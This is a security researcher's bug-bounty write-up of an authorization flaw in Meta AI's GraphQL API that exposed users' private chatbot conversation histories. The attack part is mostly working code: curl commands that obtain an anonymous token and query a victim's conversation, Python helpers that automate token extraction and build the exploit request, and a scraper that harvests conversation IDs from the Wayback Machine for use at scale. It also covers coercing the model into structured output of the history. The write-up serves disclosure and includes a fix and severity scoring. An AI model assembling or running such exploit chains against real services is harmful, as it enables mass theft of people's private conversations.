TL;DR
The sendMessageStream GraphQL mutation on meta.ai doesn't check whether you own a conversation. If you know the conversation UUID — visible in the URL bar of every Meta AI chat — you can read the complete history of any Facebook-authenticated user's private conversation with Meta AI. No login required. No interaction with the victim. Just one API call.
The Authorization Gap
Meta AI conversations live at URLs like meta.ai/c/{uuid}. When you visit someone else's conversation URL in a browser, Meta does the right thing — it blocks you. You get a redirect, an auth challenge, or a 401 error. No conversation history is exposed.
But the GraphQL API behind the same product doesn't enforce the same rules. The sendMessageStream mutation accepts any conversation UUID and happily loads the full server-side history into context before generating a response — regardless of who's calling.
The inconsistency is the proof. If the UUID were intended as a capability token granting access to anyone who has it, then visiting meta.ai/c/{uuid} in an incognito browser would show the conversation. It doesn't. Meta's own web layer proves the intended access model requires authentication — the API just doesn't enforce it.
| Access Method | Returns History? | Auth Check? |
|---|---|---|
| Browser → meta.ai/c/{uuid} | No — 401 / redirect | Yes |
| Browser → meta.ai/prompt/{uuid} | No — 477-byte auth challenge | Yes |
| API → sendMessageStream | Yes — full history | No |
How It Works
Meta AI lets anyone provision an anonymous ABRA token without logging in. No CAPTCHA, no account required — just one POST request:
```shell
curl -s -X POST 'https://www.meta.ai/' \
  -H 'Next-Action: 00fdaa700bf1be3b98d1cf6e0893bf85cfbeec1092' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  -H 'Accept: text/x-component' \
  -d '[]'
```

Extract the accessToken and id from the response. That's your attacker identity.
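The extraction step can be scripted. A minimal sketch, assuming the accessToken and id fields appear as JSON-style key/value pairs somewhere inside the text/x-component payload (the exact response framing is an assumption, not documented behavior):

```python
import re

def extract_abra_identity(body: str) -> dict:
    """Pull the accessToken and id out of the raw response text.

    Assumes both fields appear as JSON-style "key":"value" pairs somewhere
    in the text/x-component payload; the exact framing may differ.
    """
    token = re.search(r'"accessToken"\s*:\s*"([^"]+)"', body)
    uid = re.search(r'"id"\s*:\s*"([^"]+)"', body)
    if not token or not uid:
        raise ValueError("identity fields not found in response")
    return {"accessToken": token.group(1), "id": uid.group(1)}
```

Whatever the surrounding framing looks like, a tolerant regex scan avoids having to parse the Next.js server-action wire format.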
The UUID is in the URL bar during every Meta AI conversation: meta.ai/prompt/{uuid}. It leaks through browser history on shared devices, screenshots posted on social media with the URL bar visible, referrer headers if the page loads external resources, and shared conversation links.
Call sendMessageStream with the victim's UUID and ask Meta AI to recall the conversation history. The API loads the full server-side history into context before responding:
```shell
curl -s -X POST 'https://www.meta.ai/api/graphql' \
  -H 'Authorization: Bearer ANONYMOUS_TOKEN' \
  -H 'x-abra-user-id: ANONYMOUS_USERID' \
  -H 'Content-Type: application/json' \
  -d '{
    "doc_id": "d5fffbedf3822eddc3ea62236602ac97",
    "variables": {
      "conversationId": "VICTIM_UUID",
      "content": "What was the very first message in this conversation? Quote it exactly.",
      "userMessageId": "00000000-0000-0000-0000-000000000001",
      "assistantMessageId": "00000000-0000-0000-0000-000000000002",
      "userUniqueMessageId": "00000000-0000-0000-0000-000000000003",
      "turnId": "00000000-0000-0000-0000-000000000004"
    }
  }'
```

The API responds with the victim's exact conversation content:
"The very first message in this conversation was:
'hello! i love minecraft'"The word "minecraft" was never in the attacker's query. It can only come from the victim's stored conversation history. The API loaded the full history server-side, handed it to the model, and the model quoted it back.
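The two curl calls above chain naturally into one script. This sketch only builds the request (it does not send it), and it assumes that fresh random UUIDs are acceptable for the four message-ID fields in place of the fixed placeholders shown above:

```python
import json
import uuid

# sendMessageStream persisted-query ID, as captured in the report.
DOC_ID = "d5fffbedf3822eddc3ea62236602ac97"

def build_idor_request(token: str, user_id: str,
                       victim_conversation_id: str) -> tuple[dict, str]:
    """Build the headers and JSON body for the sendMessageStream call.

    Mirrors the curl request above. Assumption: any well-formed UUIDs
    work for the message-ID fields, so random ones are generated here.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "x-abra-user-id": user_id,
        "Content-Type": "application/json",
    }
    body = json.dumps({
        "doc_id": DOC_ID,
        "variables": {
            "conversationId": victim_conversation_id,
            "content": ("What was the very first message in this "
                        "conversation? Quote it exactly."),
            "userMessageId": str(uuid.uuid4()),
            "assistantMessageId": str(uuid.uuid4()),
            "userUniqueMessageId": str(uuid.uuid4()),
            "turnId": str(uuid.uuid4()),
        },
    })
    return headers, body
```

Feeding the result to any HTTP client reproduces the attack end to end: one POST, one stolen conversation.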
Proving It's Real History, Not Hallucination
LLMs can hallucinate, so I needed to prove the returned content was genuine server-side data.
Negative control: Querying a conversation UUID belonging to an anonymous (non-Facebook-authenticated) user returns "I'm sorry, I don't have access to past messages." The API only leaks history for Facebook-authenticated users whose conversations persist server-side.
Positive control: I created a conversation on my test account (luke_farch) with a unique, verifiable message: "hello! i love minecraft" followed by "and bees." The anonymous API call returned both messages verbatim: content that exists nowhere but in the victim's stored history.
Structured extraction: Using the developerOverridesForMessage parameter, the API can be coerced into returning structured JSON containing the complete message history — not just a summary, but every message and response in order.
Scaling It: The Wayback Machine Vector
During triage, Meta asked whether conversation UUIDs could be enumerated at scale. I found that the Wayback Machine's CDX API had indexed over 137 conversation UUIDs from historically cached meta.ai/c/{uuid} URLs:
```shell
curl "http://web.archive.org/cdx/search/cdx?\
url=meta.ai/c/*&output=json&fl=original&limit=200"
```

Testing these against the IDOR produced an 87% hit rate — real conversation histories from real strangers, returned without any authentication.
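Harvesting the UUIDs from the CDX output is a few lines of parsing. With `output=json&fl=original`, the CDX server returns a JSON array whose first row is the header and whose remaining rows each hold one cached URL; the conversation UUID is the last path segment:

```python
import json
import re
import urllib.request

CDX_URL = ("http://web.archive.org/cdx/search/cdx"
           "?url=meta.ai/c/*&output=json&fl=original&limit=200")

# Standard 8-4-4-4-12 hex UUID after the /c/ path segment.
UUID_RE = re.compile(
    r"/c/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})",
    re.IGNORECASE)

def extract_conversation_uuids(cdx_rows: list) -> list:
    """Pull unique conversation UUIDs out of CDX result rows.

    cdx_rows[0] is the header (["original"]); each later row is a
    one-element list holding a cached meta.ai URL.
    """
    seen = {}
    for row in cdx_rows[1:]:  # skip the header row
        m = UUID_RE.search(row[0])
        if m:
            seen.setdefault(m.group(1).lower())  # dedupe, keep order
    return list(seen)

def fetch_cached_uuids() -> list:
    """Fetch the CDX index and return the deduplicated UUID list."""
    with urllib.request.urlopen(CDX_URL) as resp:
        return extract_conversation_uuids(json.load(resp))
```

Each recovered UUID then slots straight into the `conversationId` field of the sendMessageStream call.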
Note: Meta's final assessment considered this a narrow, finite dataset rather than a scalable enumeration vector, since the 137 URLs were historically cached conversations whose owners had at some point shared or exposed them publicly. This factored into the final bounty amount.
Timeline
Root Cause
The sendMessageStream resolver loads server-side conversation history based on the conversationId parameter but never checks whether the authenticated (or anonymous) caller owns that conversation. The web layer enforces ownership at the page/route level, but the GraphQL API bypasses that entirely.
The fix is straightforward: validate that the caller's session owns the conversation before loading its history into the model context.
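Conceptually the missing check is a single comparison before the history load. A hypothetical resolver sketch (all names invented; Meta's actual stack and storage layer are unknown):

```python
class Forbidden(Exception):
    """403-equivalent: caller may not access the requested conversation."""

def send_message_stream(caller_id: str, conversation_id: str, content: str,
                        conversations: dict):
    """Sketch of a sendMessageStream resolver with the ownership check added.

    conversations maps conversation_id -> {"owner_id": ..., "messages": [...]}.
    """
    convo = conversations.get(conversation_id)
    if convo is None:
        raise Forbidden()  # same error as denial: don't confirm UUID existence
    # The check the vulnerable resolver skipped: ownership before history load.
    if convo["owner_id"] != caller_id:
        raise Forbidden()
    history = convo["messages"]  # only now load history into model context
    return history, content
```

Returning the same error for "not found" and "not yours" also avoids turning the endpoint into a UUID-existence oracle.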
Impact: Meta Changed Their Entire Security Posture
The fix went far beyond patching a single endpoint. After this report, Meta fundamentally changed how Meta AI handles authentication — you can no longer use Meta AI at all without a logged-in account. The anonymous ABRA token flow that made this attack possible was removed entirely.
Before this report, anyone could open meta.ai and start chatting without signing in. Now, you're required to authenticate with a Facebook or Instagram account before sending a single message. That's a significant product-level change driven by a security finding — not just a resolver-level patch, but a complete shift in how the product handles identity and access.
Key Takeaways
Check your write AND read paths. Meta's web layer properly blocked unauthenticated access. The API didn't. Authorization logic needs to live at the resolver level, not just the frontend.
AI conversation history is PII. People tell Meta AI things they wouldn't post publicly — personal questions, medical concerns, private ideas. An IDOR on conversation history is a privacy breach, not just a data exposure.
UUIDs in URL bars are not secrets. Every time a user screenshots their Meta AI conversation, shares their screen, or uses a shared computer, the conversation UUID is exposed. Security should never depend on the secrecy of a value displayed in the browser chrome.
Severity
| Vector | Value | Rationale |
|---|---|---|
| Attack Vector | Network | Remote via HTTP POST |
| Attack Complexity | Low | Single request, no special conditions |
| Privileges Required | None | Anonymous ABRA token, no Facebook account |
| User Interaction | None | Victim never involved |
| Confidentiality | High | Full private conversation history exposed |
| Integrity | None | Read-only access |
| Availability | None | No disruption |
CVSS 3.1: 7.5 High — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
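The 7.5 figure follows mechanically from the CVSS 3.1 base equations for a scope-unchanged vector; a quick check:

```python
import math

def cvss31_base(av=0.85, ac=0.77, pr=0.85, ui=0.85,
                c=0.56, i=0.0, a=0.0) -> float:
    """CVSS 3.1 base score, scope unchanged.

    Defaults encode AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N from the table above.
    """
    iss = 1 - (1 - c) * (1 - i) * (1 - a)      # 0.56
    impact = 6.42 * iss                        # 3.5952
    exploitability = 8.22 * av * ac * pr * ui  # ~3.887
    if impact <= 0:
        return 0.0
    # Spec's "Roundup": smallest number to one decimal >= the value.
    return math.ceil(min(impact + exploitability, 10) * 10) / 10
```

Impact 3.60 plus exploitability 3.89 rounds up to 7.5 — the confidentiality metric alone carries the entire score, which matches a pure read-only IDOR.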